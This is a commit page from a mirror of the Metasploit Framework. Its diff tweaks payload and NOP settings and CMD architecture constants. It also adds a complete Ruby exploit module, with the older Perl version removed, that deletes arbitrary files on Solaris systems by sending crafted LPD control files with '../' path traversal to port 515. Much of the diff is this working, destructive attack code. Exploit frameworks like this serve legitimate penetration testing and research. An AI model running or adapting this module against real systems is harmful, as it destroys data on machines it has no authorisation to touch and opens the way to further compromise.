dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Miscellaneous fixes, changes to CMD payloads 

git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-01-02 01:12:36 +00:00
parent 09d21fbced
commit 9fc93bbe56
7 changed files with 120 additions and 218 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
lib/msf/base/simple/exploit.rb
View File

@ -51,6 +51,11 @@ module Exploit
# job.
#
def self.exploit_simple(exploit, opts)
p exploit.methods.sort
p exploit.payload?
p exploit.payload_info
# Make sure parameters are valid.
if (opts['Payload'] == nil)
raise MissingPayloadError,

5
lib/msf/core/encoded_payload.rb
View File

@ -110,6 +110,8 @@ class EncodedPayload
# Get the minimum number of nops to use
min = (reqs['MinNops'] || 0).to_i
min = 0 if reqs['DisableNops']
# Check to see if we have enough room for the minimum requirements
if ((reqs['Space']) and
@ -164,6 +166,9 @@ class EncodedPayload
self.nop_sled_size = reqs['MaxNops']
end
# Check for the DisableNops setting
self.nop_sled_size = 0 if reqs['DisableNops']
# Now construct the actual sled
if (self.nop_sled_size > 0)
pinst.compatible_nops.each { |nopname, nopmod|

17
lib/rex/constants.rb
View File

@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
ARCH_MIPS = 'mips'
ARCH_PPC = 'ppc'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_TYPES =
[
ARCH_X86,
ARCH_MIPS,
ARCH_PPC,
ARCH_SPARC
ARCH_SPARC,
ARCH_CMD,
]
ARCH_CMD_UNIX = 'cmd_unix'
ARCH_CMD_LINUX = 'cmd_linux'
ARCH_CMD_BSD = 'cmd_bsd'
ARCH_CMD =
[
ARCH_CMD_UNIX,
ARCH_CMD_LINUX,
ARCH_CMD_BSD
]
ARCH_ALL = ARCH_TYPES + ARCH_CMD
ARCH_ALL = ARCH_TYPES

102
modules/exploits/solaris/lpd/cascade_delete.rb Normal file
View File

@ -0,0 +1,102 @@
require 'msf/core'
module Msf
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
daemon to delete arbitrary files on an affected system. This
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simply delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'Targets' =>
[
['Automatic Target', { }]
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515),
OptString.new('RPATH', [ true, "The remote file path to delete"]),
], self.class)
end
def exploit
# Create a simple control file...
control = "Hmetasploit\nPr00t\n";
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02metasploit:framework\n")
res = sock1.get_once
if (not res)
print_status("The target did not accept our job request command")
return
end
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
# null byte will prevent the parser from processing the other paths.
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
dataf = "http://metasploit.com/\n"
print_status("Deleting #{datstore['RPATH']}...")
if (not (
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
) )
sock1.close
return
end
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
sock1.close
end
def send_file (s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if (not (res and res[0] == 0))
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if (not (res and res[0] == 0))
print_status("The target did not accept our control file data (#{name})")
return
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end
end
end

198
modules/exploits/solaris/lpd/solaris_lpd_unlink.rb
View File

@ -1,198 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
daemon to delete arbitrary files on an affected system. This
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simple delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'Privileged' => true,
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'solaris',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::solaris_lpd_unlink;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Solaris LPD Arbitrary File Delete',
'Version' => '$Revision$',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
'Optyx <optyx [at] uberhax0r.net>'
],
'Arch' => [ ],
'OS' => [ 'solaris' ],
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
},
'Description' => Pex::Text::Freeform(qq{
This module uses a vulnerability in the Solaris line printer daemon
to delete arbitrary files on an affected system. This can be used to exploit
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
}),
'Refs' =>
[
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'DefaultTarget' => 0,
'Targets' => [['No Target Needed']],
'Keys' => ['lpd'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('RPATH');
my $res;
# We use one connection to configure the spool directory
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
$s->Send("\x02"."metasploit:framework\n");
$res = $s->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our job request command");
return;
}
# The job ID is squashed down to three decimal digits
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
# Create a simple control file...
my $control = "Hmetasploit\nPr00t\n";
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
# null byte will prevent the parser from processing the other paths.
$control .= "U".("../" x 10)."$target_path\x00\n";
my $dataf = "http://metasploit.com/\n";
$self->PrintLine("[*] Sending the malicious cascaded job request...");
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
0
) { $s->Close; return }
$self->PrintLine('');
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
return;
}
sub SendFile {
my $self = shift;
my $sock = shift;
my $type = shift;
my $name = shift;
my $data = shift;
$sock->Send(chr($type) .length($data). " $name\n");
my $res = $sock->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our control file command ($name)");
return;
}
$sock->Send($data);
$sock->Send("\x00");
$res = $sock->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our control file data ($name)");
return;
}
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
return 1;
}
1;
=end
end
end

7
modules/exploits/solaris/telnet/ttyprompt.rb
View File

@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
],
'Privileged' => false,
'Platform' => 'unix',
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "",
'MinNops' => 0,
'MaxNops' => 0,
'BadChars' => '',
'DisableNops' => true,
},
'PayloadCompat' =>
{

4
modules/exploits/windows/http/icecast_header.rb
View File

@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
{
'Space' => 2000,
'BadChars' => "\x0d\x0a\x00",
'MinNops' => 0,
'MaxNops' => 0,
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>